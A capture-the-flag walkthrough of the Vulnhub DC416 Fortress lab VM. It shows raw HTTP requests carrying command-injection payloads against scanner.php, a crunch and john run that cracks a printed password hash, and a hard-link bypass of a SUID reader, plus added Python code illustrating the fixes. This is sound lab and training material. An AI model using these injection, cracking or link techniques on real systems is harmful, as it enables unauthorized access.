Vulnhub – DC416 Fortress Walkthrough

This is my first write-up, on the Vulnhub DC416 Fortress challenge. We start by enumerating services, but before that we have to find the IP address of the target machine.

Information Gathering

netdiscover scans for all active devices on our network. (Our target is 192.168.1.6.)

Now that we know the target IP address, let's find out which services are running. The Nmap scan suggests the server is running FreeBSD with a few services exposed.

Port 80 has an Apache server running, so let's take a look.

There's nothing on that page. I tried to curl it to make sure there's nothing hidden in the source, but no luck.

Now it's time for my favorite part: directory enumeration.

For that we have some awesome tools already installed in Kali Linux; my favorites are dirb and dirbuster. We had no luck with the directory scan, since it couldn't find any directory, so let's try searching for files instead. We know the server is running Apache, so why not search for .php extensions.

dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt

Let's do it!

dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt -X .php

And we found our first lead, the scanner.php file (https://192.168.1.6/scanner.php). Let's take a look.

So we have something here. Let's find out what it is.

We have an input field where we enter an IP address and the page runs an Nmap command against it. Good! Maybe we can try command injection here, so let's look at its response through Burp.

Read about command injection here: Command Injection | OWASP Foundation

So we tried command injection, and it looks like there's some kind of filtering.

POST /scanner.php HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.6/scanner.php
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

host=127.0.0.1;ls

HTTP/1.1 200 OK
Date: Thu, 08 Mar 2018 23:53:45 GMT
Server: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27
X-Powered-By: PHP/5.6.27
Content-Length: 472
Connection: close
Content-Type: text/html; charset=UTF-8

S C A N N 3 R
Command: /usr/local/bin/nmap -F -sT 127.0.0.1;ls
Nope. Good try though… 💋

So this didn't work!

host=127.0.0.1;ls

Let's try again, this time with a space instead of the semicolon:

host=127.0.0.1 ls

Awesome!
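As an added example (not code from the page or from the DC416 Fortress VM, whose scanner is PHP), here is a Python model of the two ways scanner.php could validate the host field: a character blacklist like the one observed above, which still lets a space-separated extra word through, and an address allowlist plus an argv list with no shell, which is the fix. The exact set of blacklisted characters is an assumption; the nmap path and flags are the ones shown in the page's "Command:" output.

```python
import ipaddress

# Path and flags as shown in the scanner's "Command:" line on the page.
NMAP = "/usr/local/bin/nmap"


def blacklist_allows(host: str) -> bool:
    """Model (assumed) of the observed filter: a few shell metacharacters
    are rejected, but a space is not, so an extra word still gets through."""
    return not any(ch in host for ch in ";|&`$")


def allowlist_allows(host: str) -> bool:
    """Fix: accept only something that parses as a single IPv4/IPv6 address.
    Trailing words, separators or metacharacters all fail to parse."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def build_argv(host: str) -> list:
    """Build the scan command as an argv list for subprocess.run(argv)
    (shell=False), so no shell ever re-parses the user-controlled value."""
    if not allowlist_allows(host):
        raise ValueError("host must be a single IP address")
    return [NMAP, "-F", "-sT", host]


if __name__ == "__main__":
    # The three inputs tried on the page, against both checks.
    for payload in ["127.0.0.1", "127.0.0.1;ls", "127.0.0.1 ls"]:
        print(f"{payload!r:16} blacklist={blacklist_allows(payload)!s:5} "
              f"allowlist={allowlist_allows(payload)}")
```

Even with the allowlist, keep the argv form: validation protects the input, shell=False protects the call.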

Running ls -la, we found these directories:

  • k1ngd0m_k3yz
  • s1kr3t

These two directories look strange; let's have a look.

total 144
drwxr-xr-x 4 root wheel 512 Nov 9 2016 .
drwxr-xr-x 6 root wheel 512 Nov 9 2016 ..
-rw-r--r-- 1 root wheel 561 Nov 8 2016 index.html
drwxr-xr-x 2 root wheel 512 Nov 9 2016 k1ngd0m_k3yz
-rw-r--r-- 1 root wheel 44867 Nov 4 2016 logo.png
drwxr-xr-x 2 root wheel 512 Nov 9 2016 s1kr3t
-rw-r--r-- 1 root wheel 759 Nov 5 2016 scanner.php
-rw-r--r-- 1 root wheel 612 Nov 4 2016 styles.css

  • k1ngd0m_k3yz

-rw-r--r-- 1 root wheel 157 Nov 9 2016 master
-rw-r--r-- 1 root wheel 47 Nov 9 2016 passwd

  • s1kr3t

-rw-r--r-- 1 root wheel 31 Nov 4 2016 flag.txt

Now let's look inside the master and passwd files.

Inside the master file we have a password hash. Save it to hash.txt in case we can't find any further lead.

craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

Inside the passwd file:

craven:*:1002:1002:User &:/home/craven:/bin/sh

flag1

The first flag can be found in the s1kr3t directory.

cat s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}

Finally, we have found our first flag.

From our previous findings we know there's a user account named craven.

ls -la /home/craven/

-r-------- 1 craven craven 46 Nov 6 2016 flag.txt
-rw-r--r-- 1 craven craven 119 Nov 5 2016 hint.txt
-rw-r--r-- 1 craven craven 77 Nov 5 2016 reminders.txt

Looks like our second flag is inside the /home/craven/ directory.

We don't have read permission for flag.txt, so let's look at the hint.txt and reminders.txt files.

hint.txt

Keep forgetting my password, so I made myself a hint. Password is three digits followed by mypet's name and a symbol.

reminders.txt

To buy:
* skim milk
* organic free-run eggs
* dog bone for qwerty
* sriracha

Now we have a hint, and it suggests his dog's name is qwerty. We're going to add three digits before qwerty and one symbol after, which can be done with the crunch wordlist generator.

  • Qwerty
  • 3 digits
  • Symbol

crunch 10 10 -t %%%qwerty^ > pass.txt

This command generates every candidate matching that pattern (three digits, qwerty, one symbol) into pass.txt.

Now we have to crack the hash in hash.txt that we saved earlier.

john -wordlist=pass.txt hash.txt

It seems we have successfully cracked the password.

931qwerty?

Boom!

Now we’re able to get our second flag.

$ pwd
/usr/home/craven
$ ls
flag.txt hint.txt reminders.txt
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

flag2

FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

It’s time to get our third flag.

I ran cd /home and found another user, vulnhub. There's a SUID binary owned by vulnhub in its home directory, /home/vulnhub.

$ ls
craven vulnhub
$ pwd
/usr/home

Inside the vulnhub directory we have our third flag and a reader binary.

$ ls
flag.txt reader

Running file reader gives some info about the binary.

reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped

Since we can execute reader as the craven user, we can use it to read our third flag. Let's try.

It seems the binary checks that the filename is flag.txt, so let's try to trick this check with a symbolic link:

Now let's try a hard link instead. (Linux ln Command Help and Examples)

Boom!

flag3

FLAG{its_A_ph0t0_ph1ni5h}
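As an added example (not the VM's reader binary, whose source the page does not show), here is a Python model of a name-only check like the one described above, next to a hardened check that identifies the intended file by device and inode and refuses symlinks and extra hard links. The file layout is constructed in a temporary directory, and the naive check's exact logic is assumed.

```python
import os
import stat
import tempfile


def naive_check(path):
    """Assumed logic of a reader that only looks at the name: any path whose
    last component is flag.txt passes, including a hard link by that name
    that points at another user's file."""
    return os.path.basename(path) == "flag.txt"


def hardened_check(path, canonical):
    """Accept only the one intended file: not a symlink, no additional hard
    links, and the same (st_dev, st_ino) as the canonical flag file."""
    try:
        st = os.lstat(path)          # lstat: do not follow a symlink
    except OSError:
        return False
    if stat.S_ISLNK(st.st_mode) or st.st_nlink != 1:
        return False
    cst = os.stat(canonical)
    return (st.st_dev, st.st_ino) == (cst.st_dev, cst.st_ino)


def demo():
    """Constructed layout: the intended flag ("vulnhub"), a second user's
    flag the reader must not expose ("craven"), and a hard link ("hard")
    and a symlink ("sym") to that second file, both named flag.txt.
    Returns {case: (naive_result, hardened_result)}."""
    with tempfile.TemporaryDirectory() as d:
        paths = {}
        for name in ("vulnhub", "craven", "hard", "sym"):
            os.makedirs(os.path.join(d, name))
            paths[name] = os.path.join(d, name, "flag.txt")
        with open(paths["vulnhub"], "w") as f:
            f.write("FLAG{constructed_intended}\n")
        with open(paths["craven"], "w") as f:
            f.write("FLAG{constructed_secret}\n")
        os.link(paths["craven"], paths["hard"])     # hard link to the secret
        os.symlink(paths["craven"], paths["sym"])   # symlink to the secret
        return {
            case: (naive_check(paths[case]),
                   hardened_check(paths[case], paths["vulnhub"]))
            for case in ("vulnhub", "hard", "sym")
        }


if __name__ == "__main__":
    for case, (naive, hardened) in demo().items():
        print(f"{case:8} naive={naive!s:5} hardened={hardened}")
```

A real SUID reader should run this check on the opened descriptor (open with O_NOFOLLOW, then fstat) rather than on the path, so the file cannot be swapped between the check and the read.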